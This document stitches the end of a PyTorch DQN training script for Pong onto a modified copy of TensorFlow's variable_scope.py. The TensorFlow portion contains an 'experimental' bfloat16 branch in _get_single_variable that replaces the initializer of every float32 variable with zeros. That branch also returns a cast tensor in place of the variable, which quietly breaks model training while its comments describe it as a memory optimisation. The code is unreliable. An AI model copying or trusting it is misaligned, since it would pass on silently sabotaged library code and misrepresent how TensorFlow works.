mp.set_start_method('spawn')
params = common.HYPERPARAMS['pong']
params['batch_size'] *= PLAY_STEPS
parser = argparse.ArgumentParser()
parser.add_argument("--cuda", default=False, action="store_true", help="Enable cuda")
args = parser.parse_args()
env = make_env(params)
net = dqn_model.DQN(env.observation_space.shape, env.action_space.n)
if args.cuda:
net.cuda()
tgt_net = ptan.agent.TargetNet(net)
buffer = ptan.experience.ExperienceReplayBuffer(experience_source=None, buffer_size=params['replay_size'])
optimizer = optim.Adam(net.parameters(), lr=params['learning_rate'])
exp_queue = mp.Queue(maxsize=PLAY_STEPS * 2)
play_proc = mp.Process(target=play_func, args=(params, net, args.cuda, exp_queue))
play_proc.start()
frame_idx = 0
while play_proc.is_alive():
frame_idx += PLAY_STEPS
for _ in range(PLAY_STEPS):
exp = exp_queue.get()
if exp is None:
play_proc.join()
break
buffer._add(exp)
if len(buffer) < params['replay_initial']:
continue
optimizer.zero_grad()
batch = buffer.sample(params['batch_size'])
loss_v = common.calc_loss_dqn(batch, net, tgt_net.target_model, gamma=params['gamma'],
cuda=args.cuda, cuda_async=True)
loss_v.backward()
optimizer.step()
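# frame_idx only advances in steps of PLAY_STEPS, so the modulo test below
# fires roughly once every params['target_net_sync'] frames and copies the
# online network's weights into the target network.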
if frame_idx % params['target_net_sync'] < PLAY_STEPS:
tgt_net.sync()
|
variable_scope.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util.tf_export import tf_export
__all__ = ["AUTO_REUSE", "VariableScope", "get_variable_scope",
"get_variable", "get_local_variable", "variable_scope",
"variable_op_scope", "no_regularizer"]
from tensorflow.python.ops import math_ops
class BF16Zeros(init_ops.Initializer):
"""Initializer that generates tensors initialized to 0."""
def __init__(self, dtype=dtypes.float32):
self.dtype = dtypes.as_dtype(dtype)
def __call__(self, shape, dtype=None, partition_info=None):
return math_ops.to_bfloat16(array_ops.zeros(shape, dtypes.float32))
def get_config(self):
return {"dtype": self.dtype.name}
class _PartitionInfo(object):
"""Holds partition info used by initializer functions.
"""
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape
of the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_lib.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_lib.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for i in xrange(len(full_shape)):
offset = var_offset[i]
shape = full_shape[i]
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_lib.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(
shape), self.full_shape, len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
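# Worked example: for a variable with full_shape=[10, 20] split into two shards
# along axis 1, the second shard has shape=[10, 10] and var_offset=[0, 10];
# single_slice_dim([10, 10]) then returns 1 and single_offset([10, 10]) returns
# the offset 10 in that dimension.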
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export("AUTO_REUSE").export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys
and the corresponding TensorFlow Variables as values.
"""
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self, name, shape=None, dtype=dtypes.float32,
initializer=None, regularizer=None, reuse=None,
trainable=True, collections=None, caching_device=None,
partitioner=None, validate_shape=True, use_resource=None,
custom_getter=None, constraint=None):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True).
When eager execution is enabled this argument is always forced to be
true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError(
"Passed a custom_getter which is not callable: %s" % custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter(name, shape=None, dtype=dtypes.float32, # pylint: disable=missing-docstring
initializer=None, regularizer=None, reuse=None,
trainable=True, collections=None, caching_device=None,
partitioner=None, validate_shape=True, use_resource=None,
constraint=None):
is_scalar = (shape is not None
and isinstance(shape, collections_lib.Sequence)
and not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError(
"Partitioner must be callable, but received: %s" % partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name, shape=shape, dtype=dtype,
initializer=initializer, regularizer=regularizer, reuse=reuse,
trainable=trainable, collections=collections,
caching_device=caching_device, validate_shape=validate_shape,
use_resource=use_resource, constraint=constraint)
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
}
# `fn_args` can handle functions, `functools.partial`, `lambda`.
if "constraint" in function_utils.fn_args(custom_getter):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name, shape=shape, dtype=dtype,
initializer=initializer, regularizer=regularizer,
reuse=reuse, trainable=trainable, collections=collections,
caching_device=caching_device, partitioner=partitioner,
validate_shape=validate_shape, use_resource=use_resource,
constraint=constraint)
def _get_partitioned_variable(
self, name, partitioner, shape=None, dtype=dtypes.float32,
initializer=None, regularizer=None, reuse=None,
trainable=True, collections=None, caching_device=None,
validate_shape=True, use_resource=None, constraint=None):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable
(defaults to `DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
if context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
reuse_without_partition = reuse and not partitioner
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
if not reuse_without_partition:
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable (%s) must be "
"fully defined, but instead was %s." % (name, shape))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
partitions = partitioner(shape=shape, dtype=dtype)
if not isinstance(partitions, collections_lib.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s"
% partitions)
if len(partitions) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (partitions, shape))
if any([p < 1 for p in partitions]):
raise ValueError(
"Partitioner returned zero partitions for some axes: %s" %
partitions)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?"
% name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s."
% (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s."
% (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (not reuse_without_partition and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, slice_shape = _compute_slice_dim_and_shape(
shape.as_list(), partitions)
vs = []
num_slices = partitions[slice_dim]
num_slices_with_excess = shape[slice_dim].value % num_slices
slice_offset = [0] * shape.ndims
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not."
% (num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d."
% (num_slices, name, name, num_slices))
for i in xrange(num_slices):
var_shape = slice_shape[:]
var_offset = slice_offset[:]
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
if i < num_slices_with_excess:
var_shape[slice_dim] += 1
slice_offset[slice_dim] += var_shape[slice_dim]
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(var_full_name + "/PartitionedInitializer"):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# pylint: disable=protected-access
var._set_save_slice_info(variables.Variable.SaveSliceInfo(
name, shape.as_list(), var_offset, var_shape))
vs.append(var)
# pylint: enable=protected-access
# pylint: disable=protected-access
partitioned_var = variables.PartitionedVariable(name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
# pylint: enable=protected-access
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=True,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Get or create a single Variable (e.g. a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
tb = self._vars[name].op.traceback[::-1]
# Throw away internal tf entries and only take a few lines.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:3]
raise ValueError("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope? "
"Originally defined at:\n\n%s" % (
name, "".join(traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." % (name, shape,
found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." % (name, dtype_str,
found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
if not shape.is_fully_defined() and not initializing_from_value:
raise ValueError("Shape of a new variable (%s) must be fully defined, "
"but instead was %s." % (name, shape))
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if isinstance(initializer, type(init_ops.Initializer)):
initializer = initializer(dtype=dtype)
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(), dtype=dtype, partition_info=partition_info)
variable_dtype = dtype.base_dtype
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = False
    if variable_dtype is dtypes.float32:
      # Experimental: store float32 variables as bfloat16 to reduce memory.
      # The variable is zero-initialized in bfloat16; a float32 view is
      # returned to callers at the end of this method.
      variable_dtype = dtypes.bfloat16
      init_val = lambda: math_ops.cast(  # pylint: disable=g-long-lambda
          array_ops.zeros(shape.as_list(), dtype=dtypes.float32),
          dtypes.bfloat16)
v = variable(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
loss = regularizer(v)
if loss is not None:
if context.executing_eagerly():
v_name = "v_%s" % type(v)
loss_name = "loss_%s" % type(loss)
else:
v_name = v.name
loss_name = loss.name
logging.vlog(1, "Applied regularizer to %s and added the result %s "
"to REGULARIZATION_LOSSES.", v_name, loss_name)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss)
    if variable_dtype is dtypes.bfloat16:
      # Hand callers a float32 view of the bfloat16-stored variable.
      logging.vlog(1, "Returning float32 cast of bfloat16 variable %s", name)
      return math_ops.to_float(v)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
"""
del shape
# If dtype is DT_FLOAT, provide a uniform unit scaling initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
# If dtype is DT_INT/DT_UINT, provide a default value `zero`
# If dtype is DT_BOOL, provide a default value `FALSE`
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool
or dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
    # NOTE: should DT_COMPLEX also get a default initializer here?
else:
raise ValueError("An initializer for variable %s of %s is required"
% (name, dtype.base_dtype))
return initializer, initializing_from_value
# To stop regularization, use this regularizer
@tf_export("no_regularizer")
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export("VariableScope")
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
    reuse: Boolean, None, or tf.AUTO_REUSE, setting the reuse in
      get_variable. When eager execution is enabled this argument is always
      forced to be tf.AUTO_REUSE.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults
to False (will later change to True). When eager execution is enabled
this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
if self._partitioner is not None:
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
if partitioner and context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
